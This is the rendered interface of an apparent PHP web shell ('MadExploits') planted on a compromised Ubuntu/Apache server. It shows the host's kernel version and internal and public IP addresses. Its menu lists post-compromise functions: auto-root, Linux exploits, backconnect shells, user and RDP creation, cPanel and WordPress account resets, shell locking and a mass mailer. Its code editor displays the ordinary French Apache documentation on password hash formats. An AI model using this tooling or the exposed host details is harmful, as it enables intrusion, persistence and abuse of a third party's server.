Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.118.126.145
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
apache /
manual /
misc /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
550
B
-rw-r--r--
index.html.en
5.04
KB
-rw-r--r--
index.html.es
5.71
KB
-rw-r--r--
index.html.fr.utf8
5.37
KB
-rw-r--r--
index.html.ko.euc-kr
5.14
KB
-rw-r--r--
index.html.tr.utf8
5.27
KB
-rw-r--r--
index.html.zh-cn.utf8
4.75
KB
-rw-r--r--
password_encryptions.html
231
B
-rw-r--r--
password_encryptions.html.en
12.43
KB
-rw-r--r--
password_encryptions.html.fr.u...
13.38
KB
-rw-r--r--
perf-tuning.html
398
B
-rw-r--r--
perf-tuning.html.en
49.49
KB
-rw-r--r--
perf-tuning.html.fr.utf8
57.2
KB
-rw-r--r--
perf-tuning.html.ko.euc-kr
46.75
KB
-rw-r--r--
perf-tuning.html.tr.utf8
56.14
KB
-rw-r--r--
relevant_standards.html
328
B
-rw-r--r--
relevant_standards.html.en
12.14
KB
-rw-r--r--
relevant_standards.html.fr.utf...
13.01
KB
-rw-r--r--
relevant_standards.html.ko.euc...
11.1
KB
-rw-r--r--
security_tips.html
406
B
-rw-r--r--
security_tips.html.en
26.58
KB
-rw-r--r--
security_tips.html.fr.utf8
28.78
KB
-rw-r--r--
security_tips.html.ko.euc-kr
18.53
KB
-rw-r--r--
security_tips.html.tr.utf8
29.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : password_encryptions.html.fr.utf8
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="fr" xml:lang="fr"><head> <meta content="text/html; charset=UTF-8" http-equiv="Content-Type" /> <!-- XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX This file is generated from xml source: DO NOT EDIT XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX --> <title>Formats de mots de passe - Serveur HTTP Apache Version 2.4</title> <link href="../style/css/manual.css" rel="stylesheet" media="all" type="text/css" title="Main stylesheet" /> <link href="../style/css/manual-loose-100pc.css" rel="alternate stylesheet" media="all" type="text/css" title="No Sidebar - Default font size" /> <link href="../style/css/manual-print.css" rel="stylesheet" media="print" type="text/css" /><link rel="stylesheet" type="text/css" href="../style/css/prettify.css" /> <script src="../style/scripts/prettify.min.js" type="text/javascript"> </script> <link href="../images/favicon.ico" rel="shortcut icon" /></head> <body id="manual-page"><div id="page-header"> <p class="menu"><a href="../mod/">Modules</a> | <a href="../mod/directives.html">Directives</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="../glossary.html">Glossaire</a> | <a href="../sitemap.html">Plan du site</a></p> <p class="apache">Serveur HTTP Apache Version 2.4</p> <img alt="" src="../images/feather.png" /></div> <div class="up"><a href="./"><img title="<-" alt="<-" src="../images/left.gif" /></a></div> <div id="path"> <a href="http://www.apache.org/">Apache</a> > <a href="http://httpd.apache.org/">Serveur HTTP</a> > <a href="http://httpd.apache.org/docs/">Documentation</a> > <a href="../">Version 2.4</a> > <a href="./">Documentations diverses</a></div><div id="page-content"><div id="preamble"><h1>Formats de mots de passe</h1> <div class="toplang"> <p><span>Langues Disponibles: </span><a href="../en/misc/password_encryptions.html" hreflang="en" rel="alternate" title="English"> en </a> | <a href="../fr/misc/password_encryptions.html" title="Français"> fr </a></p> </div> <p>Notes à propos des formats de chiffrement des mots de passe générés et compris par Apache.</p> </div> <div id="quickview"><a href="https://www.apache.org/foundation/contributing.html" class="badge"><img src="https://www.apache.org/images/SupportApache-small.png" alt="Support Apache!" /></a><ul id="toc"><li><img alt="" src="../images/down.gif" /> <a href="#basic">Authentification de base</a></li> <li><img alt="" src="../images/down.gif" /> <a href="#digest">Authentification à base de condensés</a></li> </ul><h3>Voir aussi</h3><ul class="seealso"><li><a href="#comments_section">Commentaires</a></li></ul></div> <div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div> <div class="section"> <h2><a name="basic" id="basic">Authentification de base</a></h2> <p>Voici les cinq formats de mots de passe qu'Apache reconnaît pour l'authentification de base. Notez que tous les formats ne sont pas supportés par toutes les plates-formes :</p> <dl> <dt>bcrypt</dt> <dd>"$2y$" + the result of the crypt_blowfish algorithm. Dérivé de l'algorythme de chiffrement crypt_blowfish. Voir le fichier source APR <a href="http://svn.apache.org/viewvc/apr/apr/trunk/crypto/crypt_blowfish.c?view=markup">crypt_blowfish.c</a> pour plus de détails à propos de cet algorithme.</dd> <dt>MD5</dt> <dd>"$apr1$" + le résultat d'un algorithme spécifique à Apache utilisant un condensé MD5 réitéré (1000 fois) de combinaisons variées du mot de passe et d'une source d'entropie sur 32 bits. Voir le fichier source APR <a href="http://svn.apache.org/viewvc/apr/apr/trunk/crypto/apr_md5.c?view=markup">apr_md5.c</a> pour les détails de l'algorithme.</dd> <dt>SHA1</dt> <dd>"{SHA}" + un condensé SHA-1 du mot de passe codé en Base64. Non sûr.</dd> <dt>CRYPT</dt> <dd>Unix seulement. Utilise la fonction Unix traditionnelle <code>crypt(3)</code> avec une source d'entropie sur 32 bits (seuls 12 bits sont utilisés), et seulement les 8 premiers caractères du mot de passe. Non sûr.</dd> <dt>PLAIN TEXT (autrement dit <em>non chiffré</em>)</dt> <dd>Windows & Netware seulement. Non sûr.</dd> </dl> <h3>Générer des mots de passe avec htpasswd</h3> <div class="example"><h3>bcrypt</h3><p><code> $ htpasswd -nbB monNom monMot-de-passe<br /> monNom:$2y$05$c4WoMPo3SXsafkva.HHa6uXQZWr7oboPiC2bT/r7q1BB8I2s0BRqC </code></p></div> <div class="example"><h3>MD5</h3><p><code> $ htpasswd -nbm monNom monMot-de-passe<br /> monNom:$apr1$r31.....$HqJZimcKQFAMYayBlzkrA/ </code></p></div> <div class="example"><h3>SHA1</h3><p><code> $ htpasswd -nbs monNom monMot-de-passe<br /> monNom:{SHA}VBPuJHI7uixaa6LQGWx4s+5GKNE= </code></p></div> <div class="example"><h3>CRYPT</h3><p><code> $ htpasswd -nbd monNom monMot-de-passe<br /> monNom:rqXexS6ZhobKA </code></p></div> <h3>Générer des mots de passe CRYPT and MD5 avec le programme OpenSSL en ligne de commande</h3> <p>OpenSSL connaît l'algorithme MD5 spécifique à Apache.</p> <div class="example"><h3>MD5</h3><p><code> $ openssl passwd -apr1 monMot-de-passe<br /> $apr1$qHDFfhPC$nITSVHgYbDAK1Y0acGRnY0 </code></p></div> <div class="example"><h3>CRYPT</h3><p><code> openssl passwd -crypt monMot-de-passe<br /> qQ5vTYO3c8dsU </code></p></div> <h3>Valider des mots de passe CRYPT and MD5 avec le programme OpenSSL en ligne de commande</h3> <p>La source d'entropie pour un mot de passe CRYPT est constituée des deux premiers caractères (convertis en valeur binaire). Pour valider <code>monMot-de-passe</code> par rapport à <code>rqXexS6ZhobKA</code></p> <div class="example"><h3>CRYPT</h3><p><code> $ openssl passwd -crypt -salt rq monMot-de-passe<br /> Warning: truncating password to 8 characters<br /> rqXexS6ZhobKA </code></p></div> <p>Notez que spécifier <code>monMot-d</code> au lieu de <code>monMot-de-passe</code> produira le même résultat car seuls les 8 premiers caractères des mots de passe CRYPT sont pris en compte.</p> <p>La source d'entropie pour un mot de passe MD5 se situe entre <code>$apr1$</code> et le caractère <code>$</code> suivant (sous la forme d'une valeur binaire codée en Base64 - au maximum 8 caractères). Pour valider <code>monMot-de-passe</code> par rapport à <code>$apr1$r31.....$HqJZimcKQFAMYayBlzkrA/</code></p> <div class="example"><h3>MD5</h3><p><code> $ openssl passwd -apr1 -salt r31..... monMot-de-passe<br /> $apr1$r31.....$HqJZimcKQFAMYayBlzkrA/ </code></p></div> <h3>Champs mot de passe de base de données pour mod_dbd</h3> <p>La variante SHA1 constitue probablement le format le mieux approprié pour l'authentification DBD. Comme les fonctions SHA1 et Base64 sont en général disponibles, d'autres logiciels peuvent renseigner une base de données avec des mots de passe chiffrés utilisables par l'authentification basique d'Apache.</p> <p>Pour créer des mots de passe au format SHA1 pour l'authentification de base d'Apache dans divers langages :</p> <div class="example"><h3>PHP</h3><p><code> '{SHA}' . base64_encode(sha1($password, TRUE)) </code></p></div> <div class="example"><h3>Java</h3><p><code> "{SHA}" + new sun.misc.BASE64Encoder().encode(java.security.MessageDigest.getInstance("SHA1").digest(password.getBytes())) </code></p></div> <div class="example"><h3>ColdFusion</h3><p><code> "{SHA}" & ToBase64(BinaryDecode(Hash(password, "SHA1"), "Hex")) </code></p></div> <div class="example"><h3>Ruby</h3><p><code> require 'digest/sha1'<br /> require 'base64'<br /> '{SHA}' + Base64.encode64(Digest::SHA1.digest(password)) </code></p></div> <div class="example"><h3>C ou C++</h3><p><code> Utilisez la fonction APR : apr_sha1_base64 </code></p></div> <div class="example"><h3>Python</h3><p><code> import base64<br /> import hashlib<br /> "{SHA}" + format(base64.b64encode(hashlib.sha1(password).digest())) </code></p></div> <div class="example"><h3>PostgreSQL (avec les fonctions contrib/pgcrypto installées)</h3><p><code> '{SHA}'||encode(digest(password,'sha1'),'base64') </code></p></div> </div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div> <div class="section"> <h2><a name="digest" id="digest">Authentification à base de condensés</a></h2> <p>Apache ne reconnaît qu'un format pour les mots de passe d'authentification à base de condensés - le condensé MD5 de la chaîne <code>utilisateur:domaine-de-protection:mot-de-passe</code> sous la forme d'une chaîne de 32 caractères au format hexadécimal. <code>domaine-de-protection</code> est l'identifiant du domaine de protection de l'autorisation passé en argument à la directive <code class="directive"><a href="../mod/mod_authn_core.html#authname">AuthName</a></code> dans httpd.conf.</p> <h3>Champs de mot de passe de base de données pour mod_dbd</h3> <p>Comme la fonction MD5 est en général disponible, d'autres logiciels peuvent renseigner une base de données avec des mots de passe chiffrés utilisables par l'authentification à base de condensés d'Apache.</p> <p>Pour créer des mots de passe pour l'authentification à base de condensés d'Apache dans divers langages :</p> <div class="example"><h3>PHP</h3><p><code> md5($user . ':' . $realm . ':' .$password) </code></p></div> <div class="example"><h3>Java</h3><p><code> byte b[] = java.security.MessageDigest.getInstance("MD5").digest( (user + ":" + realm + ":" + password ).getBytes());<br /> java.math.BigInteger bi = new java.math.BigInteger(1, b);<br /> String s = bi.toString(16);<br /> while (s.length() < 32)<br /> <span class="indent"> s = "0" + s; </span> // La chaîne s contient le mot de passe chiffré </code></p></div> <div class="example"><h3>ColdFusion</h3><p><code> LCase(Hash( (user & ":" & realm & ":" & password) , "MD5")) </code></p></div> <div class="example"><h3>Ruby</h3><p><code> require 'digest/md5'<br /> Digest::MD5.hexdigest(user + ':' + realm + ':' + password) </code></p></div> <div class="example"><h3>PostgreSQL (avec les fonctions contrib/pgcrypto installées)</h3><p><code> encode(digest( user || ':' || realm || ':' || password , 'md5'), 'hex') </code></p></div> </div></div> <div class="bottomlang"> <p><span>Langues Disponibles: </span><a href="../en/misc/password_encryptions.html" hreflang="en" rel="alternate" title="English"> en </a> | <a href="../fr/misc/password_encryptions.html" title="Français"> fr </a></p> </div><div class="top"><a href="#page-header"><img src="../images/up.gif" alt="top" /></a></div><div class="section"><h2><a id="comments_section" name="comments_section">Commentaires</a></h2><div class="warning"><strong>Notice:</strong><br />This is not a Q&A section. Comments placed here should be pointed towards suggestions on improving the documentation or server, and may be removed by our moderators if they are either implemented or considered invalid/off-topic. Questions on how to manage the Apache HTTP Server should be directed at either our IRC channel, #httpd, on Libera.chat, or sent to our <a href="https://httpd.apache.org/lists.html">mailing lists</a>.</div> <script type="text/javascript"><!--//--><![CDATA[//><!-- var comments_shortname = 'httpd'; var comments_identifier = 'http://httpd.apache.org/docs/2.4/misc/password_encryptions.html'; (function(w, d) { if (w.location.hostname.toLowerCase() == "httpd.apache.org") { d.write('<div id="comments_thread"><\/div>'); var s = d.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = 'https://comments.apache.org/show_comments.lua?site=' + comments_shortname + '&page=' + comments_identifier; (d.getElementsByTagName('head')[0] || d.getElementsByTagName('body')[0]).appendChild(s); } else { d.write('<div id="comments_thread">Comments are disabled for this page at the moment.<\/div>'); } })(window, document); //--><!]]></script></div><div id="footer"> <p class="apache">Copyright 2023 The Apache Software Foundation.<br />Autorisé sous <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache License, Version 2.0</a>.</p> <p class="menu"><a href="../mod/">Modules</a> | <a href="../mod/directives.html">Directives</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="../glossary.html">Glossaire</a> | <a href="../sitemap.html">Plan du site</a></p></div><script type="text/javascript"><!--//--><![CDATA[//><!-- if (typeof(prettyPrint) !== 'undefined') { prettyPrint(); } //--><!]]></script> </body></html>
Close